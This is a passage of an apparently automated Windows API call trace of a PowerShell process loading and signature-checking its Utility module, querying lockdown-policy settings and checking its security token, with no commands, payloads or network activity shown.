RegQueryValueExW (in: hKey=0x6b8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b7dc318, lpData=0x0, lpcbData=0x1b7dc310*=0x0 | out: lpType=0x1b7dc318*=0x0, lpData=0x0, lpcbData=0x1b7dc310*=0x0) returned 0x2 [0189.177] RegCloseKey (hKey=0x6b8) returned 0x0 [0189.177] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7dbe10, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0189.177] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc2a0) returned 1 [0189.177] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x23237b8 | out: lpFileInformation=0x23237b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0189.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dc260) returned 1 [0189.177] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7dbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0189.177] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc210) returned 1 [0189.177] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x1b7dc2f0 | out: lpFileInformation=0x1b7dc2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0189.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dc1d0) returned 1 [0189.177] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7dbd80, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0189.178] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7dbbe0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0189.178] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7dbcb0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0189.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc0f0) returned 1 [0189.178] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x1b7dc1d0 | out: lpFileInformation=0x1b7dc1d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0189.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dc0b0) returned 1 [0189.178] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7dbba0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0189.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc080) returned 1 [0189.178] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6b8 [0189.178] GetFileType (hFile=0x6b8) returned 0x1 [0189.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dbff0) returned 1 [0189.178] GetFileType (hFile=0x6b8) returned 0x1 [0189.179] WTGetSignatureInfo () returned 0x0 [0189.235] CertDuplicateCertificateContext (pCertContext=0x1a8ab3b0) returned 0x1a8ab3b0 [0189.236] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7dc118 | out: phkResult=0x1b7dc118*=0x700) returned 0x0 [0189.236] RegQueryValueExW (in: hKey=0x700, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7dc168, lpData=0x0, lpcbData=0x1b7dc160*=0x0 | out: lpType=0x1b7dc168*=0x1, lpData=0x0, lpcbData=0x1b7dc160*=0x56) returned 0x0 [0189.236] RegQueryValueExW (in: hKey=0x700, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7dc168, lpData=0x2324650, lpcbData=0x1b7dc160*=0x56 | out: lpType=0x1b7dc168*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7dc160*=0x56) returned 0x0 [0189.236] RegCloseKey (hKey=0x700) returned 0x0 [0189.236] CoTaskMemAlloc (cb=0x10) returned 0x1a8dfd10 [0189.236] CoTaskMemAlloc (cb=0x50) returned 0x1a9b6120 [0189.236] WinVerifyTrust () returned 0x0 [0189.237] CoTaskMemFree (pv=0x1a9b6120) [0189.237] CoTaskMemFree (pv=0x1a8dfd10) [0189.237] CertFreeCertificateContext (pCertContext=0x1a8ab3b0) returned 1 [0189.237] CloseHandle (hObject=0x6b8) returned 1 [0189.237] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7dbd30, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0189.237] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc210) returned 1 [0189.237] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6b8 [0189.237] GetFileType (hFile=0x6b8) returned 0x1 [0189.237] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dc180) returned 1 [0189.237] GetFileType (hFile=0x6b8) returned 0x1 [0189.238] SetFilePointer (in: hFile=0x6b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7dc1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7dc1c8*=0) returned 0x0 [0189.238] ReadFile (in: hFile=0x6b8, lpBuffer=0x2325890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dc248, lpOverlapped=0x0 | out: lpBuffer=0x2325890*, lpNumberOfBytesRead=0x1b7dc248*=0x1000, lpOverlapped=0x0) returned 1 [0189.238] SetFilePointer (in: hFile=0x6b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7dc1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7dc1c8*=0) returned 0x1000 [0189.238] ReadFile (in: hFile=0x6b8, lpBuffer=0x2325890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dc248, lpOverlapped=0x0 | out: lpBuffer=0x2325890*, lpNumberOfBytesRead=0x1b7dc248*=0x1000, lpOverlapped=0x0) returned 1 [0189.238] SetFilePointer (in: hFile=0x6b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7dc1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7dc1c8*=0) returned 0x2000 [0189.238] ReadFile (in: hFile=0x6b8, lpBuffer=0x2325890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dc248, lpOverlapped=0x0 | out: lpBuffer=0x2325890*, lpNumberOfBytesRead=0x1b7dc248*=0x1000, lpOverlapped=0x0) returned 1 [0189.239] SetFilePointer (in: hFile=0x6b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7dc1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7dc1c8*=0) returned 0x3000 [0189.239] ReadFile (in: hFile=0x6b8, lpBuffer=0x2325890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dc248, lpOverlapped=0x0 | out: lpBuffer=0x2325890*, lpNumberOfBytesRead=0x1b7dc248*=0x1000, lpOverlapped=0x0) returned 1 [0189.239] SetFilePointer (in: hFile=0x6b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7dc1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7dc1c8*=0) returned 0x4000 [0189.239] ReadFile (in: hFile=0x6b8, lpBuffer=0x2325890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dc248, lpOverlapped=0x0 | out: lpBuffer=0x2325890*, lpNumberOfBytesRead=0x1b7dc248*=0x1000, lpOverlapped=0x0) returned 1 [0189.240] SetFilePointer (in: hFile=0x6b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7dc1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7dc1c8*=0) returned 0x5000 [0189.240] ReadFile (in: hFile=0x6b8, lpBuffer=0x2325890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dc248, lpOverlapped=0x0 | out: lpBuffer=0x2325890*, lpNumberOfBytesRead=0x1b7dc248*=0x298, lpOverlapped=0x0) returned 1 [0189.240] SetFilePointer (in: hFile=0x6b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7dc1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7dc1c8*=0) returned 0x5298 [0189.240] ReadFile (in: hFile=0x6b8, lpBuffer=0x2325890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dc248, lpOverlapped=0x0 | out: lpBuffer=0x2325890*, lpNumberOfBytesRead=0x1b7dc248*=0x0, lpOverlapped=0x0) returned 1 [0189.240] CoTaskMemAlloc (cb=0x20c) returned 0x1a9f81f0 [0189.240] GetSystemDirectoryW (in: lpBuffer=0x1a9f81f0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0189.240] CoTaskMemFree (pv=0x1a9f81f0) [0189.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7dbb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0189.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x1b7dbd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0189.241] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc160) returned 1 [0189.241] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b7dc240 | out: lpFileInformation=0x1b7dc240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0189.241] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dc120) returned 1 [0189.241] WldpGetLockdownPolicy () returned 0x0 [0189.241] GetSystemInfo (in: lpSystemInfo=0x1b7dc2a0 | out: lpSystemInfo=0x1b7dc2a0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0189.241] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7dc1a8 | out: phkResult=0x1b7dc1a8*=0x698) returned 0x0 [0189.241] RegQueryValueExW (in: hKey=0x698, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b7dc1f8, lpData=0x0, lpcbData=0x1b7dc1f0*=0x0 | out: lpType=0x1b7dc1f8*=0x0, lpData=0x0, lpcbData=0x1b7dc1f0*=0x0) returned 0x2 [0189.241] RegCloseKey (hKey=0x698) returned 0x0 [0189.241] CloseHandle (hObject=0x6b8) returned 1 [0189.649] CoCreateGuid (in: pguid=0x1b7dc3b8 | out: pguid=0x1b7dc3b8*(Data1=0x5292f470, Data2=0x476b, Data3=0x4146, Data4=([0]=0xa0, [1]=0xdb, [2]=0x24, [3]=0x1d, [4]=0xb8, [5]=0x3, [6]=0xcf, [7]=0xc2))) returned 0x0 [0189.649] GetCurrentProcess () returned 0xffffffffffffffff [0189.649] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7dc2d8 | out: TokenHandle=0x1b7dc2d8*=0x688) returned 1 [0189.650] GetTokenInformation (in: TokenHandle=0x688, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1b7dc378 | out: TokenInformation=0x0, ReturnLength=0x1b7dc378) returned 0 [0189.650] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1a9773e0 [0189.650] GetTokenInformation (in: TokenHandle=0x688, TokenInformationClass=0x8, TokenInformation=0x1a9773e0, TokenInformationLength=0x4, ReturnLength=0x1b7dc378 | out: TokenInformation=0x1a9773e0, ReturnLength=0x1b7dc378) returned 1 [0189.650] LocalFree (hMem=0x1a9773e0) returned 0x0 [0189.650] DuplicateTokenEx (in: hExistingToken=0x688, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1b7dc3d8 | out: phNewToken=0x1b7dc3d8*=0x6c0) returned 1 [0189.650] CheckTokenMembership (in: TokenHandle=0x6c0, SidToCheck=0x229dbb0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1b7dc3e0 | out: IsMember=0x1b7dc3e0) returned 1 [0189.650] CloseHandle (hObject=0x6c0) returned 1 [0189.697] AmsiScanString () returned 0x80070015 [0189.762] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7dbab0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0189.763] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7dba20, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0189.763] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dbe60) returned 1 [0189.763] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x1b7dbf40 | out: lpFileInformation=0x1b7dbf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0189.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dbe20) returned 1 [0189.764] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7db9d0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0189.764] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7db830, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0189.764] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7db900, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0189.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dbd40) returned 1 [0189.764] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x1b7dbe20 | out: lpFileInformation=0x1b7dbe20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0189.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dbd00) returned 1 [0189.764] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7db7f0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0189.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dbcd0) returned 1 [0189.764] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6c0 [0189.764] GetFileType (hFile=0x6c0) returned 0x1 [0189.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dbc40) returned 1 [0189.765] GetFileType (hFile=0x6c0) returned 0x1 [0189.765] WTGetSignatureInfo () returned 0x0 [0189.822] CertDuplicateCertificateContext (pCertContext=0x1a8ab5b0) returned 0x1a8ab5b0 [0189.822] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7dbd68 | out: phkResult=0x1b7dbd68*=0x6e8) returned 0x0 [0189.822] RegQueryValueExW (in: hKey=0x6e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7dbdb8, lpData=0x0, lpcbData=0x1b7dbdb0*=0x0 | out: lpType=0x1b7dbdb8*=0x1, lpData=0x0, lpcbData=0x1b7dbdb0*=0x56) returned 0x0 [0189.822] RegQueryValueExW (in: hKey=0x6e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7dbdb8, lpData=0x22c2f88, lpcbData=0x1b7dbdb0*=0x56 | out: lpType=0x1b7dbdb8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7dbdb0*=0x56) returned 0x0 [0189.822] RegCloseKey (hKey=0x6e8) returned 0x0 [0189.822] CoTaskMemAlloc (cb=0x10) returned 0x1a8e1b50 [0189.822] CoTaskMemAlloc (cb=0x50) returned 0x1a9b5b80 [0189.822] WinVerifyTrust () returned 0x0 [0189.823] CoTaskMemFree (pv=0x1a9b5b80) [0189.823] CoTaskMemFree (pv=0x1a8e1b50) [0189.823] CertFreeCertificateContext (pCertContext=0x1a8ab5b0) returned 1 [0189.823] CloseHandle (hObject=0x6c0) returned 1 [0189.824] CoCreateGuid (in: pguid=0x1b7dbd38 | out: pguid=0x1b7dbd38*(Data1=0x31944c0c, Data2=0xd57d, Data3=0x4829, Data4=([0]=0xa4, [1]=0xf, [2]=0xce, [3]=0xa7, [4]=0xd8, [5]=0x51, [6]=0xc4, [7]=0xf4))) returned 0x0 [0190.432] CoCreateGuid (in: pguid=0x1b7dbd38 | out: pguid=0x1b7dbd38*(Data1=0xfaf16752, Data2=0x43a5, Data3=0x487a, Data4=([0]=0xa5, [1]=0x25, [2]=0xa2, [3]=0x7b, [4]=0x2e, [5]=0x49, [6]=0xac, [7]=0x5e))) returned 0x0 [0190.433] CoCreateGuid (in: pguid=0x1b7dbd38 | out: pguid=0x1b7dbd38*(Data1=0x49b2d8fd, Data2=0x6168, Data3=0x4ff1, Data4=([0]=0x9d, [1]=0x5d, [2]=0x10, [3]=0xe1, [4]=0x11, [5]=0x36, [6]=0x31, [7]=0x76))) returned 0x0 [0190.784] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1a9e2930 [0190.787] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1a9e2820 [0190.879] CoCreateGuid (in: pguid=0x1b7dbd38 | out: pguid=0x1b7dbd38*(Data1=0x6bcf7865, Data2=0xa180, Data3=0x4d55, Data4=([0]=0xa9, [1]=0x1, [2]=0x96, [3]=0x28, [4]=0x0, [5]=0x17, [6]=0x8, [7]=0xb))) returned 0x0 [0191.077] CoCreateGuid (in: pguid=0x1b7dbd38 | out: pguid=0x1b7dbd38*(Data1=0x1aa1dca0, Data2=0x1a9e, Data3=0x49d1, Data4=([0]=0x9c, [1]=0xd, [2]=0x5c, [3]=0xb1, [4]=0xf8, [5]=0x2f, [6]=0xf7, [7]=0x6e))) returned 0x0 [0191.369] CoCreateGuid (in: pguid=0x1b7dbd38 | out: pguid=0x1b7dbd38*(Data1=0x69467b70, Data2=0xb10f, Data3=0x45fe, Data4=([0]=0x88, [1]=0xd2, [2]=0x14, [3]=0x2c, [4]=0xb5, [5]=0x5d, [6]=0x88, [7]=0x1f))) returned 0x0 [0191.370] CoCreateGuid (in: pguid=0x1b7dbd38 | out: pguid=0x1b7dbd38*(Data1=0xe98fb507, Data2=0x829f, Data3=0x40f0, Data4=([0]=0x9e, [1]=0xc8, [2]=0x24, [3]=0x4e, [4]=0x64, [5]=0x75, [6]=0xad, [7]=0xee))) returned 0x0 [0191.370] CoCreateGuid (in: pguid=0x1b7dbd38 | out: pguid=0x1b7dbd38*(Data1=0x41aac1b7, Data2=0x41c6, Data3=0x4bed, Data4=([0]=0x9d, [1]=0x3b, [2]=0xcc, [3]=0xbc, [4]=0x62, [5]=0x50, [6]=0xa9, [7]=0x79))) returned 0x0 [0191.442] CoCreateGuid (in: pguid=0x1b7dbd38 | out: pguid=0x1b7dbd38*(Data1=0xadd79eb5, Data2=0xf35a, Data3=0x4be2, Data4=([0]=0x97, [1]=0xd1, [2]=0x22, [3]=0xe0, [4]=0x73, [5]=0xe2, [6]=0x92, [7]=0x92))) returned 0x0 [0191.619] CoTaskMemAlloc (cb=0x20e) returned 0x1a9f3350 [0191.619] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a9f3350, nSize=0x105 | out: lpBuffer="") returned 0x0 [0191.619] CoTaskMemFree (pv=0x1a9f3350) [0191.630] EtwEventActivityIdControl () returned 0x0 [0191.630] EtwEventActivityIdControl () returned 0x0 [0191.633] EtwEventActivityIdControl () returned 0x0 [0191.767] EtwEventActivityIdControl () returned 0x0 [0191.768] CoTaskMemAlloc (cb=0x20e) returned 0x1a9f4ef0 [0191.768] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a9f4ef0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0191.768] CoTaskMemFree (pv=0x1a9f4ef0) [0191.768] EtwEventActivityIdControl () returned 0x0 [0191.768] EtwEventActivityIdControl () returned 0x0 [0191.768] EtwEventActivityIdControl () returned 0x0 [0191.770] EtwEventActivityIdControl () returned 0x0 [0191.770] CoTaskMemAlloc (cb=0x20e) returned 0x1a9f8410 [0191.770] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a9f8410, nSize=0x105 | out: 